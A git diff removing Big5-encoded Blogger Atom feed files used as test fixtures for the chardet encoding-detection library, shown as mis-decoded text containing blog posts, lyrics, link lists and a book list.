bound×÷®ֹ­װ.. ·Pִ±«·s©_§a! ­±₪ױ¬O§¼פֳׁ×÷, ¦‎¥´§ך, «o¬O±q¥¼»{ֳׁ¨ל×÷¥´§ך, ¸ע²{¦b×÷ֲאֵ¥i÷ג«₪j. ¦^¬ֲֲ·׃, ֱ`¥O₪H¦^¨‎, ¬¨ל¨÷­׃₪H, ­ל¨׃¦b¨÷­׃®ֹ­װ₪w¸gµL·N¶¡©ח₪U, «o±q₪£¯d·N, ±q₪£»{ֳׁ, ×½¨ל¾ק·|×÷¨׃ֱ{, ֵ‎§»{ֳׁ¨ל¨÷­׃, ´¿¦b¨­ֳה²₪¹L×÷₪H, ¬O÷ס¥ק, ֵ‎§­ּ»{ֳׁ§a..<br /><br />22122005 QB<br />24122005 TST<br />26122005 WC&nbsp;<a href='http://picasa.google.com/blogger/' target='ext'><img src='http://photos1.blogger.com/pbp.gif' alt='Posted by Picasa' border='0' style='border:0px;padding:0px;background:transparent;' align='absmiddle'></a> -false - - - - -Ke - -2005-12-20T19:20:00+08:00 -2005-12-20T11:25:03Z -2005-12-20T11:25:03Z - -tag:blogger.com,1999:blog-8749901.post-113507790377604792 -·tֵ²÷D - -
    p=patsy v=vincy t=total
    -
    p:₪G₪כ°µ·tֵ×ּ½ײ×¾ ִ@°µ¦b§A¨­ֳה₪ׁ¨ֿ
    ¦p¦ף¥i§i×¾ ®Iֲֳ×÷₪«ה ֱ₪·Q¥i°¸¹J¶}©l
    -
    v:µS¿±`×‎ֳצז«e ±¡₪H¦p₪µ¥u®t₪@½u
    ₪´µM¨Iְq¼ֶ¦~ ¬°¦ףֱ¥¼µo¨¥ ©ת©ת¦ז×ס«o®`²₪£¬¨£
    -
    p:©ת¦~₪´µ¥«¨׃¦~ ₪´µM§bµ¥·צ₪₪@₪ש
    ¦^ְY¾®±ז¥H«e µL¯א¬°₪Oµo¨¥ §¹¥‏ֶFֵח
    §´c¹ֵ₪F°׳₪ ×÷×ם÷t
    -
    v:₪»₪כ´N₪w½sֲ´₪ע¦ח ¬°µ¦ס§A¨C­׃¥V¦
    ±q«e×÷÷c«ה µL§־×÷®t¨ֿ ²¢¦b₪₪₪ §A₪S₪£×¾
    -
    p:₪Q₪כ±ז¨£₪½¥D₪‎₪l ·U±ז·Uִ±§₪׃₪£´¼
    ¿נ¨׃×÷₪k₪l ­ל¨׃¦­¶}©l ¿נ»{ֳׁ»°¹LְY ¦p₪µ¥‎¦
    -
    woo...
    -
    t:₪Q₪G₪כ§A·s±B₪י₪l ¦סµµ´¬±B¯½₪ׁ¨ֿ
    °g₪H×÷§₪l ±a₪W¥L₪ג« ¦b§×÷ֶ[ֲ§₪Uֳ±¯ָ
    -
    t:¹D§O¦b·tֵ×÷₪י₪l ¦‎ִ@¦ס§A¨÷­׃¥i¥H
    ¥ֳ»·×÷¾a¨ּ ¥ֳ»·×÷₪ה«ש ¯א©¯÷ײ₪@¥@₪H©M¥L ¯uו®
    -
    18122005 CW
    20122005 newct
    -
    -false -
    - - - -Ke - -2005-12-17T20:00:00+08:00 -2005-12-17T12:02:56Z -2005-12-17T12:02:56Z - -tag:blogger.com,1999:blog-8749901.post-113482097611098665 -©R¹B¹³±j«ֱ - -
    §rsir₪W₪₪₪ֶ°ף¬J®ֹ­װ´£¹L, ¦‎«Y¦n¦¦n¦h₪H³£¥¼ֵ¥¹Lֻ¬J..
    -
    ©R¹B´N¹³±j«ֱ, §A₪ֿ§₪£₪F, ´N­n¾ַ²¨ֹ¨.
    ₪u§@´N¹³½«ֱ, §A₪£¦ז₪F§O₪H´N₪W.
    ¥ֽ¬¡´N¹³¦¼¢, ₪°»ע³£±o¾a¦₪vֲש₪ג.
    ¾ַ²´N¹³¥sֲ, ₪S¥X¿ת₪S¥X₪O.
    «e³~´N¦°µ·R, ֱ`¦³°×¼י©M§C¼י.
    ¦ׂ¸ױ´N¦©°×¼י, ₪@₪ֱ§V₪O´N¬O¬°₪F³o₪@¨ט.
    -
    ®ײ¬נ´N®ײ¬נd, ¦‎«Y₪S´X©¥..
    -
    -false -
    - - - -Ke - -2005-12-16T22:05:00+08:00 -2005-12-16T14:10:52Z -2005-12-16T14:10:52Z - -tag:blogger.com,1999:blog-8749901.post-113474225258022200 -§ֱֵ‎§A. §₪~¦hµ¹. - -
    ¹L₪ץ ±i«H­ץ
    -
    ¡¯¬O§_¹ן§A©׃¿ױ₪F₪׃¦h
    ֱ¬O§­ל¥»µ¹×÷´N₪£°ק
    §A©l²׳¦³₪d¸U÷״²z¥ׁ
    §₪@×½³£¸עְH§A×÷·P¨
    ֵ‎§A÷ֵֶ‎§A¥h©סֱa
    ¥H¬°§A¦³₪ׁ·|·P°
    ֳצ©ף¬y¨¥¡@§¸ֻ§@µL°©ף°J
    -
    ¡­×½¨ל©ׂ¦³×÷¹₪w¯}¸H
    ₪~¬¨£§A×÷²´²\©M«ב®¬
    §¬O¦h·Q¦Aµ¹§A¾ק·|
    ¦h·Q°§A¨s³÷¡@·R½ײ
    ¬JµM·Rֳר₪ְ¬O«D
    ´N§O°kֱ׳¡@«i´±­±¹ן
    µ¹₪F¥L×÷₪¡@§A¬O§_¯א°ק­n±o¦^
    -
    ¡ֿ«ח»ע§װ₪©ַ§A¡@¥ַ₪F¿ש
    ¬O§µ¹§A¦¥ׁ¹L₪F₪ץ
    ֵ‎§A§ף±I¹ז¡@₪~·|³´₪J·P±¡÷x´ץ
    «ח»ע§װ₪ֵ‎§A¨§י¿i
    ¬O§µ¹§A¦¥ׁ¹L₪F₪ץ
    ¦p×G§A·Q­¸¡@¶ֻµh§´®
    -
    ­«°¡@¡¯,¡­,¡ֿ,¡ֿ
    -
    -false -
    -
    diff --git a/chardet/tests/Big5/leavesth.blogspot.com.xml b/chardet/tests/Big5/leavesth.blogspot.com.xml deleted file mode 100644 index c49f36b..0000000 --- a/chardet/tests/Big5/leavesth.blogspot.com.xml +++ /dev/null @@ -1,314 +0,0 @@ - - - - - - -¡iLeave Something¡j -::Leave Something::Internet BookMarks:: - -tag:blogger.com,1999:blog-7776391 -2005-08-26T18:52:24Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - - -Letter Lego - -2006-08-20T01:10:49+08:00 -2004-11-11T14:55:49Z -2004-11-11T13:53:44Z - -tag:blogger.com,1999:blog-7776391.post-110018122418437625 -easy horoscope -<iframe src="http://www.easyhoroscope.com/horoscope_2.php?loc=1100180247689" name="Horoscope" width=365 height=200 frameborder=0 marginwidth=0 marginheight=0 hspace=0 align=middle><br> <br /></iframe> <br /><a href="http://www.easyhoroscope.com/">easy horoscope <br />"the free daily horoscope on my website"</a> <br />¡@¡@FREE SERVICE for webmasters <br />¡@¡@put a FLASH DAILY HOROSCOPE on your web page ! <br />¡@¡@>> customize the horoscope's colors to fit your webpage style <br />¡@¡@>> then just copy and paste our html code : EASY ! -false - - - - - -Letter Lego - -2005-06-25T01:07:00+08:00 -2005-06-24T17:07:30Z -2004-11-23T03:35:29Z - -tag:blogger.com,1999:blog-7776391.post-110118092909650899 -Ogisan's blog - -
    -
    -New Link Update: 2005/06/25 -
    -
    Ogisan's blog -
    ¡@¡@¥xֶW³ּ¦³¦W×÷¢¢ױ¢ב¡A§d©ְ¯u×÷³¡¸¨®ז
    -
    Ori Post Time: 2004/11/23 1135
    -
    -
    -
    -false -
    - - - - -Letter Lego - -2004-12-17T14:47:27+08:00 -2004-12-17T06:47:27Z -2004-12-17T06:47:27Z - -tag:blogger.com,1999:blog-7776391.post-110326604761588169 -«ָ³~²§®ָ - -
    - «ָ³~²§®ָ -
    ¡@¡@¨C¦¸×÷®ָµ{³£¬O°g³~₪§®ָ¡A¬O¹L©¹»P·ם₪U½ְִ»×÷°g÷פ¡A¦‎¦b°g³~₪§«ב¡Aֱ`¯א§ף¥[²M·¡¦₪v©ׂ¦b×÷¦ל¸m
    -
    -false -
    - - - - -Letter Lego - -2004-12-09T16:02:33+08:00 -2004-12-09T08:02:33Z -2004-12-09T08:02:33Z - -tag:blogger.com,1999:blog-7776391.post-110257935376750306 -´ְ¥N¦÷¦D±ְ°ֱp·ש - -
    -´ְ¥N¦÷¦D±ְ°ֱp·ש -
    ¡@¡@12₪כ10₪י¥@¬ֹ₪Hֵv₪י¡A±‏₪H¼v®i¦b¦ט×שֻmֱ`²־ְ¸°|
    -
    -false -
    - - - - -Letter Lego - -2004-12-02T18:46:17+08:00 -2004-12-02T10:48:17Z -2004-12-02T10:46:18Z - -tag:blogger.com,1999:blog-7776391.post-110198437892776937 -JustBlogIt - - - -false - - - - - -Letter Lego - -2004-12-02T17:36:13+08:00 -2004-12-02T09:36:13Z -2004-12-02T09:36:13Z - -tag:blogger.com,1999:blog-7776391.post-110198017337072513 -«¢¬P¬P³¡¸¨®ז - - - -false - - - - - -Letter Lego - -2004-11-30T23:42:21+08:00 -2004-12-09T03:30:21Z -2004-11-30T15:42:52Z - -tag:blogger.com,1999:blog-7776391.post-110182937297034472 -Starting from the Beginning - -
    -Starting from the Beginning -
    ¡@¡@Welcome, strangers, to this brave new world
    -
    -false -
    - - - - -Letter Lego - -2004-11-30T18:00:52+08:00 -2004-11-30T15:39:52Z -2004-11-30T10:00:51Z - -tag:blogger.com,1999:blog-7776391.post-110180885179029086 -Blogbox.com -<a href="http://www.blogbox.com/">Blogbox.com</a> <br />Blogboxes provide exciting, instantly deployed functionality for your blog or Web site. They are free for non-commercial use. Enjoy them and spread the good word! <br /><blockquote><li>Sized compactly to fit within your blog gutter <br /><li>Customizable via editing of a simple external XML configuration file <br /><li>Easy to embed within HTML templates via script tags <br /><li>Viewable from any Web browser enabled with the Flash 5 Player or later</li> <br /></blockquote> -false - - - - - -Letter Lego - -2004-11-30T11:28:52+08:00 -2004-11-30T03:28:52Z -2004-11-30T03:28:52Z - -tag:blogger.com,1999:blog-7776391.post-110178533277618444 -ccho's¹q¼v÷פ - -
    -ccho's¹q¼v÷פ -
    ¡@¡@±zֶ[¬¹q¼v×÷³ּ¨־₪J×ש¾ִֹ‎««n
    -
    -false -
    - - - - -Letter Lego - -2004-11-28T23:45:12+08:00 -2004-11-30T15:38:12Z -2004-11-28T15:45:37Z - -tag:blogger.com,1999:blog-7776391.post-110165673765933907 -·L­·₪i»y - -
    -·L­·₪i»y -
    ¡@¡@®ֹ¶¡¦ַ¹׀₪U×÷¨C₪@¹ץ¡A³£¦³©p×÷¨­¼v¿¢ֲ¶µ¡C -
    ¡@¡@₪ו³¹¼X³ץ -
    -
    [¥ז´«₪י°O]¡@[ֵ×®ׁµ§°O]¡@[­J»¡₪K¹D]¡@[°gֵ¼B­Y­^] -
    [¥L₪s₪§¥]¡@[ֲ_ֲ²´½g]¡@[×x¶ְ₪י°O]¡@[µe¥ח¦p¸] -
    [µN¯ש½׳ְ¸]¡@[­¸ֲE³·×d]¡@[¼X³ץ³X«ָ]
    -
    -
    -false -
    - - - - -Letter Lego - -2004-11-25T10:50:29+08:00 -2004-11-25T02:55:29Z -2004-11-25T02:50:49Z - -tag:blogger.com,1999:blog-7776391.post-110135104979333526 -Reset - -
    - -RESET -
    Reset
    -
    ¡@¡@Reset¡Aֱ­ל°ע¥»×k¡A¨t²־­«¸ֻ¡A₪@₪ֱ§ף·s­«³]¡C
    -
    -false -
    - - - - -Letter Lego - -2004-11-24T14:12:20+08:00 -2004-11-24T06:12:20Z -2004-11-24T06:12:20Z - -tag:blogger.com,1999:blog-7776391.post-110127674009222971 -₪ץ®ד₪H×÷¬G¨ֶ - -
    -₪ץ®ד₪H×÷¬G¨ֶThe Story of Matchman -
    ¡@¡@§¹¾דש×÷¡m¥ֵי·R±¡ֶ[¡n¡Aֱ¦³¥t₪@³¡§@«~¡mµ״³£₪s₪W×÷₪ץ®ד₪H¡n¡C
    -
    -false -
    - - - - -Letter Lego - -2004-11-23T11:36:57+08:00 -2004-11-23T03:36:57Z -2004-11-23T03:36:57Z - -tag:blogger.com,1999:blog-7776391.post-110118101756400383 -₪p³¥'s­®w³¡¸¨®ז - -
    -₪p³¥'s­®w³¡¸¨®ז -
    ¡@¡@₪£±o₪£¨״×A¡A³¡¸¨®ז₪§­·¦ז§r¡I
    -
    -false -
    - - - - -Letter Lego - -2004-11-23T09:18:39+08:00 -2004-11-23T01:18:39Z -2004-11-23T01:18:39Z - -tag:blogger.com,1999:blog-7776391.post-110117271928095621 -₪ׁ¥ֵֽ]₪k - -
    -₪ׁ¥ֵֽ]₪k -
    ¡@¡@§§ֶ±ז§¯א¦Y¨ל§·Q¦Y×÷×F¦ט¡A¦׃¥B₪£­nֵ­D...... -
    ¡@¡@₪@­׃¦ם₪י¥»×÷......??₪ׁ¥ֵֽ]₪k??......
    -
    -false -
    - - - - -Letter Lego - -2004-11-23T08:21:14+08:00 -2004-11-23T00:21:14Z -2004-11-23T00:21:14Z - -tag:blogger.com,1999:blog-7776391.post-110116927454509771 -Jedi's BLOG | Jedi.org - - - -false - -
    diff --git a/chardet/tests/Big5/letterlego.blogspot.com.xml b/chardet/tests/Big5/letterlego.blogspot.com.xml deleted file mode 100644 index 99c6e7f..0000000 --- a/chardet/tests/Big5/letterlego.blogspot.com.xml +++ /dev/null @@ -1,1123 +0,0 @@ - - - - - - -Letter Lego -¹ן§¦׃¨¥¡A<br> -¥u₪£¹L¬O₪ו¦r¼ײ°×¹Cְ¸¡F<br> -§ה¼ײ₪l¡A¬°¥ֽ¦s<br> -¡@It's only a game for me<br> -¡@to play letter lego...<br> -¡@for fun... for live...<p> - -tag:blogger.com,1999:blog-7678098 -2005-08-26T18:38:40Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -Letter Lego - -2004-12-08T23:34:10+08:00 -2004-12-09T08:47:10Z -2004-12-08T15:43:58Z - -tag:blogger.com,1999:blog-7678098.post-110252063803051839 -¡iֲא¸¡j¯ֳ¬ש₪½¦@¹ֿ®ְׁ]¡y¥@¬צ₪§®ׁ¡z¡]₪U¡^ - -
    -¥@¬צ₪§®ׁ¡]₪U¡^ -
    -
    ₪‎¿¼‎¡@°ך®a¹ֿ®ְׁ]°ׁ¦ׂ²ױ¥N¥D¥פ
    -
    ¡@¡@¯ֳ¬ש₪½¦@¹ֿ®ְׁ]¬°¼y¯¬¨ה¦¨¥100¶g¦~¡A¯S©ף1995¦~05₪כ20₪י¦1996¦~07₪כ13₪יֱ|¿ל₪@¶µ¡u¥@¬צ₪§®ׁ¡v¡]Books of the Century¡^×÷®iִ‎¡A¦@¬D¿ן¨ֳ®i¥X¹ן¥»¥@¬צ¨ד¦³¼vֵT₪O×÷159¥»¸g¨ו®ִׁy¡C³o159¥»®ׁ³ז¡A¬O¥ׁ¯ֳ¬ש₪½¦@¹ֿ®ְׁ]¸ך²`¥B¨ד¦³¾ַ³Nֵv«ֲ×÷®ׁ¥״±M®a¡B¥DֳD±M®aµ¥¥‎×ל¿ן¡B±ְֲֻ¥X1100÷״¹ֿ®ׁ¡A¦A±q₪₪½ֶ¿ן¥X¨׃×÷¡A¨ֳ₪ְ¬°11₪jֳ‏®i¥X¡C¦׃«ב¥D½s¬ד¨s²ױ¥D¥פֲLצ·× Elizabeth Diefendorf ®¾¦U₪ט·N¨£¡A°u¼W³¡¥ק¹ֿ®ׁ¡A¨ֳ¼W¥[¡u¨אµ£₪־«C¦~ֵ×׫¡v Favorites of Childhood and Youth ³o₪@ֳ‏¡Aֱ`­p¥»®ׁ¥״¦@₪ְ12ֳ‏¡A¦¬®ׁ175÷״¡C -
    -
    ¡@¡@¥Xש¦~«ב¦³¡u¡¯¡v°O¸¹×ּ¡A×ם¥µ§×ּ¬d¨ל¦³₪₪ִ¶¥»×ּ¡Aֱצ₪£₪@©w§¹¾ד¡A¦‎₪´¥i¨ׁ°ׁ¦ׂ¡C -
    -
    ¥״¦¸
    ₪C¡B´£×@₪kֵv¡]Women Rise¡^₪ט­±×÷¸g¨וµ§@ -
    ₪K¡B¸gְ©M§³N₪ט­±¹ֿ®ׁ -
    ₪E¡B´y­z²z·Q°ך¡]Utopias¡^©־¦³¯³´×÷×ְ·|¡]Dystopias¡^₪§¹ֿ®ׁ -
    ₪Q¡B¾װ×§¡B₪j±O±‏©M·¥ֵv¥D¸q¡]War¡BHolocaust¡BTotalitarianism¡^¸g¨ו -
    ₪Q₪@¡B¼ײֶ[¥D¸q¡B³®®¡Bְu¶®¡]Optimism¡BJoy¡BGentility¡^₪ט­±×÷®ׁ -
    ₪Q₪G¡B¨אµ£¡B«C¦~³·R×÷ֵ×׫¡]Favorites of Childhood and Youth¡^
    -
    - -
    ₪C¡B´£×@₪kֵv¡]Women Rise¡^₪ט­±×÷¸g¨וµ§@¡׀¡׀11÷״ -
    -
      -
    • 1920¦~¡¯¬°ך₪k₪p»¡®a¡Uµ״¹y¡UEdith Wharton, 1862-1937 -
      ¡m¯ֲ¯u¦~¥N¡nThe Age of Innocence -
      -
    • -
    • 1923¦~¡@¬°ך´£­ׂ°₪k§כ²¼ֵv¹B°»ג³S¡U¥[¯S¡UCarrie Chapman Catt, 1895-1947 -
      ¡m°₪k¿ןֱ|ֵv»P¬F×v¡nWoman Suffrage and Politics: The Inner Story of the Suffrage Movement -
      -
    • -
    • 1931¦~¡@¬°ך¸`¨|±M®a¡U®ב®ז¡UMargaret Sanger, 1879-1966 -
      ¡m§¬°¥ֽ¨|±±¨מ×÷¾ִ¾װ¡nMy Fight for Birth Control -
      -
    • -
    • 1942¦~¡@¬°ך¶ֲ₪H¥ֱ«U¾ַ®a©M§@®a¡U»®´µ¹y¡UZora Neale Hurston, 1901-1960 -
      ¡m₪½¸פ₪W¹׀₪g­¸´­¡nDust Tracks on a Road -
      -
    • -
    • 1949¦~¡¯×k°ך₪k§@®a¡B₪kֵv¥D¸q×ּ¡U×i«½¡USimone de Beauroir, 1908-1986 -
      -¡m²ִ₪G©¡nLe deuxieme sexe; ­^ִ¶ The Second Sex -
      -
    • -
    • 1962¦~¡@­^°ך₪k§@®a¡Uµ©¯¡UDoris Lessing, 1919- -
      -¡m×ק¦גµ§°O¡nThe Golden Notebook -
      -
    • -
    • 1963¦~¡¯¬°ך₪kֵv¹B°®a¡U¥±¨½₪¦¡UBetty Friedan, 1921- -
      ¡m₪k©°g«ה¡nThe Feminine Mystique -
      -
    • -
    • 1969¦~¡@¬°ך§@®a¡B÷q°®a¡U¦wµXֳ¹¡UMaya Angelou, 1928- -
      ¦¶ַ¡m§×¾¹D¬°¦ףֵ¢³¾÷q°¡nI Know Why the Caged Bird Sings -
      -
    • -
    • 1970¦~¡@¬°ך°¹B₪j±N¡B¸ײ₪H¡B½s¿ט¡U¼¯®¡URobin Morgan, 1914- -
      ½s¡m°₪k²ױֲ´¬O¦³₪O×÷¡G¬°ך°₪k¸ׁ©ס¹B°₪ו¿ן¡nSisterhood is Powerful: An Anthology of Writings from the Women's Liberation Movement -
      -
    • -
    • 1975¦~¡¯¬°ך§@®a¡B°¹B»ג³S¡U«k®װ¦ּ°ַ¡USusan Brownmiller, 1935- -
      ¡m©+¼ֹ₪O=?¡nAgainst Our Will: Men, Women and Rape -
      -
    • -
    • 1982¦~¡¯¬°ך₪k§@®a¡Uµ״§J¡UAlice Walker, 1944- -
      -¡mµµ¦ג©n©f×ב¡nThe Color Purple -
      -
    • -
    -
    ₪K¡B¸gְ©M§³N₪ט­±¹ֿ®ׁ¡׀¡׀11÷״ -
    -
      -
    • 1899¦~¡¯­^°ך¸gְ¾ַ®a¡U«ֲ₪Rִץ¡UT.Veblen¡A1857-1929 -
      -¡m¦³¶¢¶¥¯ֵ½׳¡nThe Theory of the Leisure Class: An Economic Study of Institutions -
      -
    • -
    • 1904¦~¡¯¼w°ך×ְ·|¾ַ®a¡B¬F×v¸gְ¾ַ®a¡U­³§B¡UMax Weber¡A1864-1920 -
      ¡m°ע·‏±׀·s±׀­²z©M¸ך¥»¥D¸q÷כ¯«¡nThe Protestant Ethic and Spirit of Capitalism -
      -
    • -
    • 1907¦~¡¯¬°ך¾ת¥v¾ַ®a¡U¨ָ·ם´µ¡UHenry Adams¡A1838-1918 -
      ¦¶ַ ¡m¦כ§Q¨ָ·ם´µ×÷±׀¨|¡nThe Education of Henry Adams -
      -
    • -
    • 1936¦~¡¯­^°ך¸gְ¾ַ®a¡U³ֽ¦]´µ¡UJohn M.Keynes¡A1883-1946 -
      ¡m´N·~¡B§Q®§©M³f¹פ³q½׳¡nThe General Theory of Employment, Interest and Money -
      -
    • -
    • 1944¦~¡¯¿D¸ַ­^ִy¸gְ¾ַ®a¡U®­C§J¡UF.A.Von Hayek¡A1899-1992 -
      ¡m¨ל¥£§׀₪§¸פ¡nThe Road to Serfdom -
      -
    • -
    • 1957¦~¡¯¬°ך¸gְ¾ַ®a¡U¥±§Q¼w°ׂ¡UMilton Friedman¡A1912- -
      ¡m®ר¶O¥\¯א²z½׳¡nA Theory of the Consumption Function -
      -
    • -
    • 1958¦~¡¯¬°ך¸gְ¾ַ®a¡U»\§B·ח´µ¡UJ.K.Galbraith¡A1908- -
      ¡m´I¸־×ְ·|¡nThe Affluent Society -
      -
    • -
    • 1961¦~¡¯¬°ך³£¥«­p¹÷±M®a¡B§@®a¡U¶®¦U¡UJane Jacobs¡A1916- -
      ¡m¬°ך«°¥«×÷¦÷»P¥ֽ¡nThe Death and Life of Great American Cities -
      -
    • -
    • 1970¦~¡¯¬°ך§@®a¡U§ץ÷¯S¡UHelen Leavitt¡A1932- -
      ¡m¶W¯ֵ°×³t₪½¸פ¡׀¡׀¶W¯ֵ×÷´c§@¼@¡nSuperhighway¡׀¡׀Super Hoax -
      -
    • -
    • 1973¦~¡¯¼w°ך¸gְ¾ַ®a¡Uµ־°¨§J¡UE.F.Schumacher¡A1911-1977 -
      -¡m₪p¬O¬¡nSmall is Beautiful: A Study of Economacs as if People Mattered -
      -
    • -
    • 1992¦~¡¯¬°ך÷פ¸פ±M®a¡U§Jֳ¹¡UED Krol¡A1962- -
      ¡m¾דֵי÷פ»÷פ¸פ¡nThe Whole Internet: User's Guide¡®Catalog -
      -
    • -
    -
    ₪E¡B´y­z²z·Q°ך¡]Utopias¡^©־¦³¯³´×÷×ְ·|¡]Dystopias¡^₪§¹ֿ®ׁ¡׀¡׀13÷״ -
    -
      -
    • 1895¦~¡¯­^°ך₪p»¡®a¡U«ֲ÷¸´µ¡UH.G.Well¡A1866-1946 -
      -¡m®ֹ¶¡¾ק¾¹¡nThe Time Machine -
      -
    • -
    • 1896¦~¡¯µS₪׃´_°ך¥D¸q³׀©l₪H¡U»®¯‎÷¸¡UTheodor Herzi¡A1860-1904 -
      ¡mµS₪׃₪H°ך®a¡nDer Judenstaat; ­^ִ¶ The Jewish State -
      -
    • -
    • 1900¦~¡¯¬°ך§@®a¡U¥]©i¡UL.F.Baum¡A1856-1919 -
      -¡m÷ס³¥¥Pֲ¡nThe Wonderful Wizard of Oz -
      -
    • -
    • 1906¦~¡¯­^°ך¼@§@®a¡B₪p»¡®a¡U₪§Q¡UJ.M.Barrie¡A1860-1937 -
      ¡m×ײ¨¯¹y×ב¶י₪₪₪§©¼±o¼ן¡n¡]Peter Pan in Kensingtom Gardens¡^ -
      -
    • -
    • 1915¦~¡¯¬°ך§@®a¡U¦N÷¸°ׂ₪ׂ₪H¡UCharlotte P.Gilman¡A1860-1935 -
      ¡m¦o¶m¡nHerland -
      -
    • -
    • 1932¦~¡¯­^°ך₪p»¡®a¡U»®­E¾₪¡UAldous Huxley¡A1894-1963 -
      -¡m¬ִR·s¥@¬ֹ¡nBrave New World -
      -
    • -
    • 1933¦~¡¯­^°ך₪p»¡®a¡U§ֶ÷¸¹y¡UJames Hilton¡A1900-1954 -
      ¡m¥¢¥h×÷¦a¥­½u¡nLose Horizon -
      -
    • -
    • 1948¦~¡¯¬°ך₪²z¾ַ®a¡U´µ×ק¯ַ¡UB.F.Skinner¡A1904-1990 -
      ¡mµ״÷¸ִֻ²ִ₪G¡nWalden Two -
      -
    • -
    • 1949¦~¡¯­^°ך₪p»¡®a¡U¼«ֲ÷¸¡UGeorge Orwell¡A1903-1950 -
      -¡m1984¡nNineteen Eighty-four -
      -
    • -
    • 1953¦~¡¯¬°ך¬ל₪₪p»¡®a¡U¥¬µ¼w§B¨½¡URay Bradbury¡A1920- -
      ¡mµ״₪ף451«׳¡nFahrenheit 451 -
      -
    • -
    • 1957¦~¡¯«X¸ַ¬°ך₪k§@®a¡Uִץ¼w¡UAyn Rand¡A1905-1982 -
      ¡mׯS©װ´µֱq×׃»H¡nAtlas Shrugged -
      -
    • -
    • 1962¦~¡¯­^°ך₪p»¡®a¡U¬f°ע´µ¡UAnthony Burgess¡A1917-1993 -
      -¡m¸ֻ¦³µo±ר×÷¾ן₪l¡nA Clockwork Orange -
      -
    • -
    • 1985¦~¡¯¥[®³₪j₪k¸ײ₪H¡B₪p»¡®a¡UׯS¥מ¼w¡UMargaret Atwood¡A1939- -
      ¡m₪k¹²×÷¬G¨ֶ¡nHandmaid's Tale -
      -
    • -
    -
    ₪Q¡B¦³ֳצ¾װ×§¡B₪j±O±‏©M·¥ֵv¥D¸q¡]War, Holocaust, Totalitarianism¡^¡׀¡׀¸g¨ו18÷״ -
    -
      -
    • 1915¦~¡¯­^°ך¾ת¥v¾ַ®a¡U´צ®¦₪ס¡UArnold J.Toynbee¡A1889-1975 -
      ¡m¨ָ¬¥§¨ָ₪H×÷÷G®׳¡G₪@­׃°ך®a×÷¿ׁ±‏¡nArmenian Atrocities: The Murder of a Nation -
      -
    • -
    • 1919¦~¡¯¬°ך¸ײ₪H¡B«_ְI®a¡U¦C¼w¡UJohn Reed¡A1887-1920 -
      ¡m¾_ֵו¥@¬ֹ×÷₪Q₪י¡nTen Day that Shook the World -
      -
    • -
    • 1919¦~¡¯­^°ך¸ײ₪H¡B₪p»¡®a¡Uֲִ×Q¡USiegfried Sasson¡A1886-1967 -
      ¡m¾װ×§¸ײ½g¡nThe War Poems -
      -
    • -
    • 1920-1923¦~¡@±¶§J§@®a¡U«¢ֱֲ§J¡UJaroslav Hasek¡A1883-1923 -
      ¡m¦n§L«׃§J¡nOsudy dobreho vojaka Svejka za svtove Valky; ­^ִ¶ The Good Solodier Schweik -
      -
    • -
    • 1925¦~¡¯¼w°ך¯ַ÷י¿Wµפ×ּ¡U§ֶ¯S°ַ¡UAdolf Hitler¡A1889-1945 -
      ¡m§×÷¾ִ°«¡nMaun Kampf -
      -
    • -
    • 1928¦~¡¯¼w°ך₪p»¡®a¡U¹p°¨§J¡UErich Maria Remarque¡A1898-1970 -
      ¡m¦ט½uµL¾װ¨ֶ¡nIm Westennichts Neues; ­^ִ¶ All Quiet on the Western Front -
      -
    • -
    • 1935-1940¦~¡¯«X°ך₪k¸ײ₪H¡U×»®÷¿ֹל«½¡UAnna Akhmatova¡A1889-1966 -
      ¡m¦wֶFְ±¼»¡nRekviem; ­^ִ¶ Reqiem -
      -
    • -
    • 1940¦~¡¯¬°ך₪p»¡¡U®©ת«ֲ¡UErnest Hemingway¡A1899-1961 -
      ¡m¾װ¦aֱֱִn¡nFor Whom the Bell Tolls -
      -
    • -
    • 1941¦~¡¯¦I₪ת§Q₪p»¡®a¡B·s»D°O×ּ¡U³ֽ´µ¯S°ַ¡UArthur Koestler¡A1905-1983 -
      ¡m₪₪₪ָ×÷¶ֲ·t¡nDarkness at Noon -
      -
    • -
    • 1946¦~¡¯¬°ך₪p»¡®a¡B°O×ּ¡U»®¦ט¡UJohn Hersey¡A1914-1993 -
      ¡m¼s®q¡nHiroshima -
      -
    • -
    • 1947¦~¡¯²ִץµS₪׃₪ײ₪k¡U¦w©g¡D×kִץ§J¡UAnne Frank¡A1929-1945 -
      -¡m¦w©g×÷₪י°O¡n¡]­ל¦W¡m±K«ַ¡n¡^Het Achterhuis; ­^ִ¶ The Diary of a Young Girl -
      -
    • -
    • 1948¦~¡¯­^°ך§@®a¡B¬F×v®a¡U×פ¦N÷¸¡UWinston Churchill¡A1874-1965 -
      ¡m»E·|×÷­·¼ֹ¡n¡A¡m²ִ₪G¦¸¥@¬ֹ₪j¾װ¡n¥‏₪»¥U₪§²ִ₪@¥U¡FThe Gathering Storm¡]The Second World War¡^ -
      -
    • -
    • 1958¦~¡¯₪₪¦@»ג¾ֹ₪H¡U₪ע¿A×F¡UMao Zedong¡A1893-1976 -
      ¡m₪ע»y¿‎¡nQuotation from Chaurman Mao -
      -
    • -
    • 1970¦~¡¯¬°ך₪p»¡®a¡U¥¬®װ¡UDee Alexander Brown¡A1908- -
      ¡mֲ_»מ¶ֻ½¥×e¡nBury My Heart at Wounded Knee¡GAn Indian History of the American West -
      -
    • -
    • 1973-1975¦~¡¯«X°ך§@®a¡U¯ֱ§װ¥§¨¯¡UAleksandr I.Solzhenitsy¡A1918- -
      ¡m¦N©װ®ז¸s®q¡nArkhipelag GuLag¡A1918-1956; ­^ִ¶ The Gulag Archipelago¡A1918-1956 -
      -
    • -
    • 1977¦~¡¯¬°ך₪p»¡®a¡U»®÷¸¡UMichael Herr¡A1940- -
      ¡m¬£»÷¡nDispatches -
      -
    • -
    • 1986-1991¦~¡U¬°ך§@®a¡B¥d³qµe®a¡U¥v₪ס§J°ׂ¡UArt Spiegelman¡A1947- -
      ¡m₪ע´µ¡G₪@­׃§T«ב¾l¥ֽ×÷¬G¨ֶ¡nMaus¡GA Survivor's Tale -
      -
    • -
    -
    ₪Q₪@¡B¦³ֳצ¼ײֶ[¥D¸q¡B³®®¡Bְu¶®¡]Optimism¡BJoy¡BGentility¡^₪ט­±×÷®ׁ¡׀¡׀15÷״ -
    -
      -
